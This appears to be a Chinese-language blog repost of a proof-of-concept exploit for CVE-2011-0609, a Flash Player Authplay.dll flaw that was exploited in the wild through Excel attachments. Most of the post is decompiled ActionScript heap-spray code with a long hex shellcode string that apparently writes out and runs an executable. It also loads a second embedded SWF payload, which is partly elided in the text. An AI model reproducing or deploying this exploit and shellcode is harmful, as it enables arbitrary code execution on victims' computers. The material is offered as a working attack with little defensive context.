http://www.pulog.org/poc/1958/CVE-2011-0609/Adobe Flash Player是一款Flash文件处理程序。Windows, Macintosh, Linux和Solaris操作系统下的Adobe Flash Player 10.2.152.33和之前版本(dobe Flash Player 10.2.154.18和用于Chrome用户的早期版本),Android下的Adobe Flash Player 10.1.106.16及早期版本,Windows和Macintosh操作系统下的Adobe Reader及Acrobat X (10.0.1)和Reader及Acrobat早期10.x和9.x版本提供的Authplay.dll组件存在严重安全漏洞。可能导致执行任意代码。漏洞在网络上已积极利用,把恶意FLASH(.swf)文件嵌入到Microsoft Excel (.xls),并通过Email附件进行攻击。Adobe Reader和Acrobat. Adobe Reader X不受此漏洞影响。
[+]info:
~~~~~~~~~
CVE-2011-0609 - Adobe Flash Player ZeroDay
Filename: crsenvironscan.xls
Size:126,444 bytes
MD5 Hash: 4BB64C1DA2F73DA11F331A96D55D63E2[+]poc:
~~~~~~~~~
漏洞利用的actionscript
003 | import flash.display.*; |
004 | import flash.system.*; |
005 | import flash.utils.*; |
007 | public class hs extends MovieClip |
009 | static const POOL_SIZE:int = 1048576; |
010 | static var allocs:Array; |
011 | static var pool:ByteArray; |
012 | static var dstSize:int; |
013 | static var allocCount:int; |
014 | static var cevent:Function; |
015 | static var childRef:DisplayObject = null ; |
016 | static var container:Sprite = null ; |
020 | var _loc_1:* = new ByteArray(); |
021 | _loc_1.endian = Endian.LITTLE_ENDIAN; |
025 | if (_loc_3 < 5140 - 32) |
027 | _loc_1.writeInt(336860180); |
031 | _loc_1.writeInt(2425393296); |
032 | _loc_1.writeInt(2425393296); |
033 | var _loc_4:String = "141414141414141414141414141414141414141414141414141464A1300000008B400C8B701CAD8B7008E93D0200005881EC000200008BFC89770889471090FF770868EC97030CE8CC01000089471CFF770868F622B97CE8BC010000894720FF770868A517007CE8AC010000894724FF770868FB97FD0FE89C010000894728FF7708681665FA10E88C01000089472CFF7708681F790AE8E87C010000894730FF77086825B0FFC2E86C010000894734FF770868AC08DA76E85C010000894738FF77086898FE8A0EE84C01000089473CFF77086883B9B578E83C010000894740FF770868E6178F7BE82C010000894744FF770868AD9B7DDFE81C010000894748FF7710FF573433F6468D47605056FF574883F8FF74F23D0000010076EB894704897760FF77046A40FF571C89475C6A006A006A00FF7760FF573883F8FF744B6A008D5F7053FF7704FF775CFF7760FF572C8B4F7083E9108B475C408138432E42477509817804040689197404E2ECEB1A83C0088947144081384655634B750981780424048219740EE2ECFF775CFF57200F8572FFFFFF83C0088947186A0068800000006A026A006A006800000040FF7710FF5724894764C7476C4D5A90006A008D5F70536A048D5F6C53FF7764FF57308B47182B471483E8088B5F1430034348434883F80075F56A008D5F70538B5F182B5F1483EB0853FF7714FF7764FF5730FF7764FF57286A00FF7710FF573C6A00FF57446A0050FF5740558BEC578B7D088B5D0C568B733C8B74337803F3568B762003F333C94941AD03C35633F60FBE1038D67408C1CE0D03F240EBF13BFE5E75E55A8BEB8B5A2403DD668B0C4B8B5A1C03DD8B048B03C55E5F5DC20800E8BEFDFFFF612E6578650000" ; |
034 | _loc_1.writeBytes(hexToBin(_loc_4)); |
035 | _loc_3 = _loc_1.length; |
039 | _loc_1.writeInt(336860180); |
043 | alloc(_loc_1, 1048576 - 1536 - 36); |
044 | var _loc_5:* = new ByteArray(); |
045 | _loc_5.writeBytes(pool, 0, 1048576 - 3840 - 36); |
052 | var _loc_7:* = new ByteArray(); |
053 | _loc_7.writeBytes(_loc_5, 0, 1048576 - 3840 - 36); |
058 | var _loc_8:String = "43575309eac70000789cbcbc09601bc5153fbc33bbdad54a3e245f712e4721c64e8c1b27015a4809e01cce0189432e02c5b6.............[skipped]....................." ; |
059 | var _loc_9:* = new Loader(); |
060 | var _loc_10:* = new LoaderContext( false ); |
061 | _loc_9.loadBytes(hexToBin(_loc_8), _loc_10); |
062 | childRef = this .addChild(_loc_9); |
066 | public static function init_pool(param1) |
068 | hs.pool = new ByteArray(); |
069 | hs.pool.writeBytes(param1); |
070 | while (hs.pool.length < 1048576) |
073 | var _loc_3:* = new ByteArray(); |
074 | _loc_3.writeBytes(hs.pool); |
075 | hs.pool.writeBytes(_loc_3); |
080 | public static function alloc(param1, param2) |
082 | if (hs.allocs == null ) |
084 | hs.allocs = new Array(); |
087 | hs.init_pool(param1); |
091 | public static function free() |
097 | public static function hexToBin(param1:String) : ByteArray |
099 | var _loc_2:* = new ByteArray(); |
100 | var _loc_3:* = param1.length; |
105 | var _loc_5:* = param1.charAt(_loc_4) + param1.charAt((_loc_4 + 1)); |
106 | _loc_2.writeByte(parseInt(_loc_5, 16)); |
漏洞更多信息参见:http://bugix-security.blogspot.com/2011/03/cve-2011-0609-adobe-flash-player.html
沒有留言:
張貼留言